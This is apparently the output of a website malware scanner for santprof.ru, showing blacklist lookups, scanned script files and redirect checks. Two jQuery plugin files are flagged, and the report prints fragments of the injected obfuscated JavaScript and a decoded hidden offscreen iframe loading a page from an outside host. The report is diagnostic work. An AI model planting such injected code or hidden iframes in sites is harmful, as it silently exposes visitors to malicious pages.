Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=santprof.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://santprof.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.santprof.ru/ | 200 OK Content-Length: 23359 Content-Type: text/html | clean |
http://www.santprof.ru/media/system/js/core.js | 200 OK Content-Length: 4225 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/templates/santprof/js/jquery-1.6.1.min.js | 200 OK Content-Length: 93043 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/templates/santprof/js/myjquery.js | 200 OK Content-Length: 20079 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/templates/santprof/js/jquery.maskedinput-1.3.min.js | 200 OK Content-Length: 5010 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/templates/santprof/js/jquery.colorbox.js | 200 OK Content-Length: 29877 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD e.preventDefault(); launch(this); } }; if ($.fn.delegate) { $(document).delegate('.' + boxElement, 'click', handler); } else { $('.' + boxElement).live('click', handler); } $(publicMethod.init); }(jQuery, document, this));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.santprof.ru/templates/santprof/js/jquery.printPage.js | 200 OK Content-Length: 4822 Content-Type: application/x-javascript | clean |
http://www.santprof.ru/templates/santprof/js/jquery-ui-1.8.16.custom.min.js | 200 OK Content-Length: 20970 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD a.rotate(null)}:function(){t=c.selected;h()});if(b){this.element.bind("tabsshow",h);this.anchors.bind(c.event+".tabs",e);h()}else{clearTimeout(a.rotation);this.element.unbind("tabsshow",h);this.anchors.unbind(c.event+".tabs",e);delete this._rotate;delete this._unrotate}return this}})})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://posimak.jatstv.com.au/jtrjgbcvnxbzhahtrj12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> Antivirus reports:
| ||
http://www.santprof.ru//mc.yandex.ru/metrika/watch_visor.js/ | 404 Not Found Content-Length: 3033 Content-Type: text/html | clean |
http://www.santprof.ru//mc.yandex.ru/metrika/watch_visor.js/index.php/ | 404 Not Found Content-Length: 3033 Content-Type: text/html | clean |
http://www.santprof.ru//mc.yandex.ru/metrika/watch_visor.js/index.php/index.php/ | 404 Not Found Content-Length: 3033 Content-Type: text/html | clean |
http://www.santprof.ru//mc.yandex.ru/metrika/watch_visor.js/index.php/index.php/index.php/ | 404 Not Found Content-Length: 3033 Content-Type: text/html | clean |
http://www.santprof.ru//mc.yandex.ru/metrika/watch_visor.js/index.php/index.php/index.php/index.php/ | 404 Not Found Content-Length: 3033 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: santprof.ru
Result:
GET / HTTP/1.1
Host: santprof.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: santprof.ru
Referer: http://www.google.com/search?q=santprof.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: santprof.ru
Referer: http://www.google.com/search?q=santprof.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.